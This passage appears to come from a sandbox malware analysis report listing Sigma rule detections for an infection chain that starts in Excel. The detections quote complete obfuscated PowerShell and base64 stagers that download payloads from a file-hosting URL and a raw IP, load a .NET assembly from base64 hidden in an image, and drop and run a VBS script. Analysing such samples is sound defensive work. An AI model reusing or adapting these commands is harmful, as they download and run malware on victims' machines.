Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 3972, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3216, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3540, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe, ProcessId: 3760, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 3972, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdl

